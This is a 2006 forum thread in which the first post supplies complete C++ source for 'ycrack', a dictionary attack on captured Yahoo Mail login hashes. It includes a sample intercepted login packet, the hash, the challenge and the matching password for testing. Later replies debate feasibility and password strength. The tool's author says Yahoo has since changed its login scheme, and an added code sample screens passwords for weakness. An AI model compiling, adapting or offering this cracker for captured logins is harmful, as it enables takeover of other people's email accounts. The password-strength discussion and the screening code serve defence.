Foe_4_mysty
 Hack Yahoo E-mail Password
Posted on 08-09-06 3:02 PM
 

For those who have c++ knowledge..
*********************************
usage of the program is:
#./ycrack <password hash> <challenge text> <word file>

Below is an example login packet. Note the strings following 'challenge=' and 'passwd='; those are what you are looking for.

GET /reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login?
.tries=1&.src=ym&.md5=&.hash=&.js=1&.last=&promo=&.intl=us&.bypass=&
.partner=&.u=08oidol1a8gav&.v=0&
.challenge=sHahwb_63ScGiwVT2q5lh7bi1JEv&.yplus=&.emailCode=&pkg=&
stepid=&.ev=&hasMsgr=0&.chkP=Y &.done=http%3A//mail.yahoo.com&login=xxxxxxxxxxxxxx
&passwd=0c5d98f1305bad4045863f78a335fc30 &.persistent=&.save=1&.hash=1&.md5=1 HTTP/1.1
Host: us.rd.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q= 0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.yahoo.com/?.intl=us
Cookie: Y=v=1&n=ftsocmdj9pbtu&p=

You may use the hashed password and challenge text in this packet to test ycrack (the password used is 'beaver'). Example:

#./ycrack 0c5d98f1305bad4045863f78a335fc30 sHahwb_63ScGiwVT2q5lh7bi1JEv english_list.txt

The file english_list.txt is the dictionary (text file with one word per line)

This program compiles on both Linux and Mcft Windows platforms
Tool's Source Code:
Quote:
/* I'm not the best programmer, and I know this is a bit sloppy, but it works. Feel free to modify/optimize/do whatever you want
* with this code, just give me credit if it is due.
*
* Description:
* ycrack performs a dictionary attack on hashed Yahoo mail passwords. See the readme file for more information on Yahoo's
* implementation of the MD5 hashing algorithm. Standard MD5 functions are from RSA Data Security.
*
* Usage:
* #./ycrack <password hash> <challenge text> <word file>
*
* Compilation:
* Compiles on both Linux and Windows platforms (tested on Windows XP and Linux 2.4.21)
* #g++ ycrack.cpp -o ycrack
*
* Craig Heffner
* (03/06/05)
*/

/////////////////////////////////////////////////////////////////////////
//
// Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
// rights reserved.
//
// License to copy and use this software is granted provided that it
// is identified as the "RSA Data Security, Inc. MD5 Message-Digest
// Algorithm" in all material mentioning or referencing this software
// or this function.
// License is also granted to make and use derivative works provided
// that such works are identified as "derived from the RSA Data
// Security, Inc. MD5 Message-Digest Algorithm" in all material
// mentioning or referencing the derived work.
// RSA Data Security, Inc. makes no representations concerning either
// the merchantability of this software or the suitability of this
// software for any particular purpose. It is provided "as is"
// without express or implied warranty of any kind.
// These notices must be retained in any copies of any part of this
// documentation and/or software.
/////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>

//md5.h file:
typedef unsigned int uint4;
typedef unsigned short int uint2;
typedef unsigned char uchar;

char* PrintMD5(uchar md5Digest[16]);
char* MD5String(char* szString);
char* MD5File(char* szFilename);

class md5
{
// Methods
public:
md5() { Init(); }
void Init();
void Update(uchar* chInput, uint4 nInputLen);
void Finalize();
uchar* Digest() { return m_Digest; }

private:

void Transform(uchar* block);
void Encode(uchar* dest, uint4* src, uint4 nLength);
void Decode(uint4* dest, uchar* src, uint4 nLength);


inline uint4 rotate_left(uint4 x, uint4 n)
{ return ((x << n) | (x >> (32-n))); }

inline uint4 F(uint4 x, uint4 y, uint4 z)
{ return ((x & y) | (~x & z)); }

inline uint4 G(uint4 x, uint4 y, uint4 z)
{ return ((x & z) | (y & ~z)); }

inline uint4 H(uint4 x, uint4 y, uint4 z)
{ return (x ^ y ^ z); }

inline uint4 I(uint4 x, uint4 y, uint4 z)
{ return (y ^ (x | ~z)); }

inline void FF(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += F(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void GG(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += G(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void HH(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += H(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

inline void II(uint4& a, uint4 b, uint4 c, uint4 d, uint4 x, uint4 s, uint4 ac)
{ a += I(b, c, d) + x + ac; a = rotate_left(a, s); a += b; }

// Data
private:
uint4 m_State[4];
uint4 m_Count[2];
uchar m_Buffer[64];
uchar m_Digest[16];
uchar m_Finalized;

};
//end of md5.h

/*Start of MD5 code*/
static unsigned char PADDING[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21


// PrintMD5: Converts a completed md5 digest into a char* string.
char* PrintMD5(uchar md5Digest[16])
{
char chBuffer[256];
char chEach[10];
int nCount;

memset(chBuffer,0,256);
memset(chEach, 0, 10);

for (nCount = 0; nCount < 16; nCount++)
{
sprintf(chEach, "%02x", md5Digest[nCount]);
strncat(chBuffer, chEach, sizeof(chEach));
}

return strdup(chBuffer);
}

// MD5String: Performs the MD5 algorithm on a char* string, returning
// the results as a char*.
char* MD5String(char* szString)
{
int nLen = strlen(szString);
md5 alg;

alg.Update((unsigned char*)szString, (unsigned int)nLen);
alg.Finalize();

return PrintMD5(alg.Digest());

}

// md5::Init
// Initializes a new context.
void md5::Init()
{
memset(m_Count, 0, 2 * sizeof(uint4));

m_State[0] = 0x67452301;
m_State[1] = 0xefcdab89;
m_State[2] = 0x98badcfe;
m_State[3] = 0x10325476;
}

// md5::Update
// MD5 block update operation. Continues an MD5 message-digest
// operation, processing another message block, and updating the
// context.
void md5::Update(uchar* chInput, uint4 nInputLen)
{
uint4 i, index, partLen;

// Compute number of bytes mod 64
index = (unsigned int)((m_Count[0] >> 3) & 0x3F);

// Update number of bits
if ((m_Count[0] += (nInputLen << 3)) < (nInputLen << 3))
m_Count[1]++;

m_Count[1] += (nInputLen >> 29);

partLen = 64 - index;

// Transform as many times as possible.
if (nInputLen >= partLen)
{
memcpy( &m_Buffer[index], chInput, partLen );
Transform(m_Buffer);

for (i = partLen; i + 63 < nInputLen; i += 64)
Transform(&chInput[i]);

index = 0;
}
else
i = 0;

// Buffer remaining input
memcpy( &m_Buffer[index], &chInput[i], nInputLen-i );
}

// md5::Finalize
// MD5 finalization. Ends an MD5 message-digest operation, writing
// the message digest and zeroizing the context.
void md5::Finalize()
{
uchar bits[8];
uint4 index, padLen;

// Save number of bits
Encode (bits, m_Count, 8);

// Pad out to 56 mod 64
index = (unsigned int)((m_Count[0] >> 3) & 0x3f);
padLen = (index < 56) ? (56 - index) : (120 - index);
Update(PADDING, padLen);

// Append length (before padding)
Update (bits, 8);

// Store state in digest
Encode (m_Digest, m_State, 16);

memset(m_Count, 0, 2 * sizeof(uint4));
memset(m_State, 0, 4 * sizeof(uint4));
memset(m_Buffer,0, 64 * sizeof(uchar));
}

// md5::Transform
// MD5 basic transformation. Transforms state based on block.
void md5::Transform (uchar* block)
{
uint4 a = m_State[0], b = m_State[1], c = m_State[2], d = m_State[3], x[16];

Decode (x, block, 64);

// Round 1
FF (a, b, c, d, x[ 0], S11, 0xd76aa478);
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756);
FF (c, d, a, b, x[ 2], S13, 0x242070db);
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee);
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf);
FF (d, a, b, c, x[ 5], S12, 0x4787c62a);
FF (c, d, a, b, x[ 6], S13, 0xa8304613);
FF (b, c, d, a, x[ 7], S14, 0xfd469501);
FF (a, b, c, d, x[ 8], S11, 0x698098d8);
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af);
FF (c, d, a, b, x[10], S13, 0xffff5bb1);
FF (b, c, d, a, x[11], S14, 0x895cd7be);
FF (a, b, c, d, x[12], S11, 0x6b901122);
FF (d, a, b, c, x[13], S12, 0xfd987193);
FF (c, d, a, b, x[14], S13, 0xa679438e);
FF (b, c, d, a, x[15], S14, 0x49b40821);

// Round 2
GG (a, b, c, d, x[ 1], S21, 0xf61e2562);
GG (d, a, b, c, x[ 6], S22, 0xc040b340);
GG (c, d, a, b, x[11], S23, 0x265e5a51);
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa);
GG (a, b, c, d, x[ 5], S21, 0xd62f105d);
GG (d, a, b, c, x[10], S22, 0x2441453);
GG (c, d, a, b, x[15], S23, 0xd8a1e681);
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8);
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6);
GG (d, a, b, c, x[14], S22, 0xc33707d6);
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87);
GG (b, c, d, a, x[ 8], S24, 0x455a14ed);
GG (a, b, c, d, x[13], S21, 0xa9e3e905);
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8);
GG (c, d, a, b, x[ 7], S23, 0x676f02d9);
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a);

// Round 3
HH (a, b, c, d, x[ 5], S31, 0xfffa3942);
HH (d, a, b, c, x[ 8], S32, 0x8771f681);
HH (c, d, a, b, x[11], S33, 0x6d9d6122);
HH (b, c, d, a, x[14], S34, 0xfde5380c);
HH (a, b, c, d, x[ 1], S31, 0xa4beea44);
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9);
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60);
HH (b, c, d, a, x[10], S34, 0xbebfbc70);
HH (a, b, c, d, x[13], S31, 0x289b7ec6);
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa);
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085);
HH (b, c, d, a, x[ 6], S34, 0x4881d05);
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039);
HH (d, a, b, c, x[12], S32, 0xe6db99e5);
HH (c, d, a, b, x[15], S33, 0x1fa27cf8);
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665);

// Round 4
II (a, b, c, d, x[ 0], S41, 0xf4292244);
II (d, a, b, c, x[ 7], S42, 0x432aff97);
II (c, d, a, b, x[14], S43, 0xab9423a7);
II (b, c, d, a, x[ 5], S44, 0xfc93a039);
II (a, b, c, d, x[12], S41, 0x655b59c3);
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92);
II (c, d, a, b, x[10], S43, 0xffeff47d);
II (b, c, d, a, x[ 1], S44, 0x85845dd1);
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f);
II (d, a, b, c, x[15], S42, 0xfe2ce6e0);
II (c, d, a, b, x[ 6], S43, 0xa3014314);
II (b, c, d, a, x[13], S44, 0x4e0811a1);
II (a, b, c, d, x[ 4], S41, 0xf7537e82);
II (d, a, b, c, x[11], S42, 0xbd3af235);
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb);
II (b, c, d, a, x[ 9], S44, 0xeb86d391);

m_State[0] += a;
m_State[1] += b;
m_State[2] += c;
m_State[3] += d;

memset(x, 0, sizeof(x));
}

// md5::Encode
// Encodes input (uint4) into output (uchar). Assumes nLength is
// a multiple of 4.
void md5::Encode(uchar* dest, uint4* src, uint4 nLength)
{
uint4 i, j;

assert(nLength % 4 == 0);

for (i = 0, j = 0; j < nLength; i++, j += 4)
{
dest[j] = (uchar)(src[i] & 0xff);
dest[j+1] = (uchar)((src[i] >> 8) & 0xff);
dest[j+2] = (uchar)((src[i] >> 16) & 0xff);
dest[j+3] = (uchar)((src[i] >> 24) & 0xff);
}
}

// md5::Decode
// Decodes input (uchar) into output (uint4). Assumes nLength is
// a multiple of 4.
void md5::Decode(uint4* dest, uchar* src, uint4 nLength)
{
uint4 i, j;

assert(nLength % 4 == 0);

for (i = 0, j = 0; j < nLength; i++, j += 4)
{
dest[i] = ((uint4)src[j]) | (((uint4)src[j+1])<<8) | (((uint4)src[j+2])<<16) | (((uint4)src[j+3])<<24);
}
}
/*End of MD5 code*/

int main(int argc,char *argv[])
{
char *hash1,*challenge,*string,*hash2,*crypt,*file,test[256],stuff[256];

if(argc<4)
{
printf("\nUsage: ycrack <password hash> <challenge text> <word file>\n");
return 0;
}

crypt=argv[1]; //password hash
challenge=argv[2]; //challenge text
file=argv[3]; //word file

FILE *f;
f=fopen(file,"r"); //open word list
if(!f){printf("\nError opening file %s\n",file);return 0;}
while(fscanf(f,"%255s",test)==1){ //read each word into 'test' until End Of File (width limit keeps it inside the buffer)
string=test;
printf("Trying:%s\n",string);
hash1=MD5String(string); //get MD5 hash of the password
memcpy(&stuff[0],hash1,32); //copy the hashed password into stuff
memcpy(&stuff[32],challenge,28); //append challenge text onto the end of the password hash
stuff[60]='\0'; //terminate the 60-character string
free(hash1); //MD5String returns a strdup'd buffer
hash2=MD5String(stuff); //calculate final hash
if(strcmp(crypt,hash2)==0){ //compare hash2 to the captured hash
printf("\nThe Yahoo password is: %s\n",string);
free(hash2);
fclose(f);
return 0;}
free(hash2);
}
fclose(f);
printf("\nPassword not found!\n");
return 0;
}
 
Posted on 08-09-06 3:28 PM
 

Does it work? If yes, why are you making it public? I'm having a Yahoo account :-S, don't do that.
 
Posted on 08-09-06 4:19 PM
 

It may work, but it's a dictionary attack. If you have your password as an alphanumeric string then this program will not work for that, and I think Yahoo uses 128 bit encryption, i.e. 2^128 combinations to look for if you want to redirect the whole packet. Good luck with your hacking code. I think Yahoo will block access to your email after 3 unsuccessful logins, and you want to use dictionary hacking. Have fun working with it and try hacking my p@$$w0rd. (Sorry, it's not a dictionary word.)
 
Posted on 08-09-06 6:41 PM
 

So what would you suggest a good password type would be?

Any word from the dictionary would be the easiest to crack.

Any non-dictionary word that is made only of letters is probably second easiest to crack.

How about alpha-numeric combinations of 6 characters or more? That should be pretty hard, no?

Perhaps putting symbols such as % or $ or # or @ makes the password even more difficult to crack, right?

Whaddya say?
 
Posted on 08-09-06 6:42 PM
 

http://www.craigheffner.com/programming.html , the guy who wrote this code is Craig Heffner. He is actually interested in security stuff. As per him, the code actually tests the strength of your password.
 
Posted on 08-09-06 8:10 PM
 

This is just a dictionary password cracker, there is no way that it's going to work. Brute force is the worst way of cracking the password; it may take days to get the password if the password is a dictionary word. The MD5 algorithm is in one of the .js files in Yahoo mail itself. The tough thing is reversing the MD5 hash, which is practically impossible, although recent studies have theoretically reversed the MD5 hash. People, you don't need to be afraid of this crack, I mean this crack was like 4 years old now.

Social engineering is a better way to get someone's password and it works if you know where to dig for information.
 
Posted on 08-09-06 8:42 PM
 

This technique is at least 10 years old.. I knew about it in 1998.. but it surely existed way before that...
 
Posted on 08-09-06 8:47 PM
 

In hackers' view finding someone's password is not hacking, it's cracking. Hacking is the real stuff, making your machine work in your way. Cyberdude was right, using BruteForce you would have to check everything one by one. If you consider the permutation of the letters in your dictionary and implement the Brute Force searching technology to find the password. Good Luck...

The number of candidates in your case is 4.03291461 × 10^26 or 40.329 millions quadrillion, that means let your computer do the job and it will take you 5.32262047 × 10^10 years or 53.22 billion years provided that your computer is P4 2.4 GHz. Wanna start hacking my password now???

I don't think so....
 
Posted on 08-09-06 11:24 PM
 

Hey, try to crack my password then.. ha ha... I bet you guys can't, because one of the characters in my password is not even on your keyboard.. ha ha.. how will you hack??? idiots.
 
Posted on 08-09-06 11:25 PM
 

forgot to give you my email.... billgates at yahoo dot com
 
Posted on 08-10-06 8:04 AM
 

I saw a bunch of people visiting my site from here, so I came on over to check it out. Let me try to clarify some things about Ycrack and password cracking in general:

1) No, you don't have to worry about this code because Yahoo no longer uses this encryption. They have since switched over to SSL encryption (which is probably worse, IMHO).

2) Yes, this technique (dictionary attack) is old - about as old as passwords themselves. The only reason I wrote this code was because Yahoo actually ran the password through the MD5 function twice, which no other password crackers (to my knowledge) took into account. However, just because it is old doesn't mean that you shouldn't fear it - dictionary and brute force attacks still work, so just make sure your password is strong. I mean, I still fear a guy with a 14th century sword... :)

3) Speaking of passwords, something like 'beaver1' is not a strong password...many password cracking lists have similar permutations of dictionary words and will therefore be able to crack the password using a dictionary attack. A strong password should contain multiple numbers and symbols and upper and lowercase characters, and be at least 8 characters long.

4) I think some people are confusing dictionary attack with brute force - yes, brute forcing a password can take forever, but that's why I made this a dictionary attack. Depending on the size of your word list (and the strength of your password), dictionary attacks could take a few minutes or a few days and may or may not be successful (ycrack can go through all the words in the English dictionary in a few minutes on a 1.6GHz machine).

5) Yahoo locking out your account after 3 tries is not an issue here because ycrack does not actually try to log into your account. You must capture a login packet (data going from your web browser to the yahoo server that contains your encrypted password), then feed the encrypted password to ycrack and it performs an offline dictionary attack.

6) If you're interested in password cracking, check out www.openwall.com/john (John The Ripper, a very fast password cracker) and parallel computing (openmosix.org is a good start).

7) DISCLAIMER: I don't hack people's accounts and I don't encourage or support anyone who does. Using anything I've written or linked to for malicious purposes is entirely on you, and if you don't know what you're doing you'll probably get caught - don't come crying to me.
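
The kind of screening a site could run at password-change time to catch what point 3 above describes, as an added example that is not part of the original post or of ycrack: it flags passwords that reduce to a dictionary word once trailing digits or common character substitutions are undone, alongside the length and character-class criteria listed there. The word list, the substitution table, the flag names and the reading of "multiple" as two or more are assumptions made for illustration.

```cpp
#include <cctype>
#include <cstdio>
#include <initializer_list>
#include <set>
#include <string>

// Constructed sample word list; a real check would load a large dictionary file.
static const std::set<std::string> kWords = {"beaver", "password", "dragon", "letmein"};

enum Weakness : unsigned {
    TOO_SHORT = 1, NO_UPPER = 2, NO_LOWER = 4,
    FEW_DIGITS = 8, FEW_SYMBOLS = 16, DICTIONARY_BASED = 32
};

// Lowercase the input, optionally undoing common substitutions ("p@$$w0rd" -> "password").
static std::string normalize(const std::string& s, bool unleet) {
    static const std::string from = "0134@5$7", to = "oieaasst";  // assumed substitution table
    std::string out;
    for (unsigned char c : s) {
        std::string::size_type k = unleet ? from.find(static_cast<char>(c)) : std::string::npos;
        out += (k != std::string::npos) ? to[k] : static_cast<char>(std::tolower(c));
    }
    return out;
}

// Drop leading and trailing non-letters so "beaver1" and "Beaver2006!" reduce to the bare word.
static std::string strip_affixes(const std::string& s) {
    std::string::size_type b = 0, e = s.size();
    while (b < e && !std::isalpha(static_cast<unsigned char>(s[b]))) ++b;
    while (e > b && !std::isalpha(static_cast<unsigned char>(s[e - 1]))) --e;
    return s.substr(b, e - b);
}

// Returns a bitmask of Weakness flags; 0 means the password passed every check.
unsigned screen_password(const std::string& pw) {
    unsigned flags = 0;
    int upper = 0, lower = 0, digits = 0, symbols = 0;
    for (unsigned char c : pw) {
        if (std::isupper(c)) ++upper;
        else if (std::islower(c)) ++lower;
        else if (std::isdigit(c)) ++digits;
        else ++symbols;
    }
    if (pw.size() < 8) flags |= TOO_SHORT;
    if (!upper) flags |= NO_UPPER;
    if (!lower) flags |= NO_LOWER;
    if (digits < 2) flags |= FEW_DIGITS;    // assumption: "multiple" read as two or more
    if (symbols < 2) flags |= FEW_SYMBOLS;  // same assumption for symbols
    const std::string core = strip_affixes(pw);
    for (const std::string& form : {normalize(pw, false), normalize(core, false),
                                    normalize(pw, true), normalize(core, true)})
        if (kWords.count(form)) { flags |= DICTIONARY_BASED; break; }
    return flags;
}

int main() {
    for (const char* pw : {"beaver1", "p@$$w0rd", "Beaver2006!", "Tr7#kq9!Lm"})
        std::printf("%-12s -> weakness mask %u\n", pw, screen_password(pw));
    return 0;
}
```

A password can satisfy every character-class rule and still carry the `DICTIONARY_BASED` flag, which is the case the wordlist permutations mentioned in point 3 exploit.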
 
Posted on 08-10-06 10:10 AM
 

We're honored to have you here Craig!!! :)
 
Posted on 08-10-06 10:18 AM
 
 
Posted on 08-10-06 1:30 PM
 

Hey cheff, thanks for being over here. I was just trying to say that the code you wrote is not something that people should freak about or try it and get disappointed.

Seems like you did this for GCC. Not a frequent C++ guy, kinda got into C# due to demands.

Take care keep posting
 
Posted on 08-10-06 3:01 PM
 

Cheff
Thankz for sharing.

Shweta
 

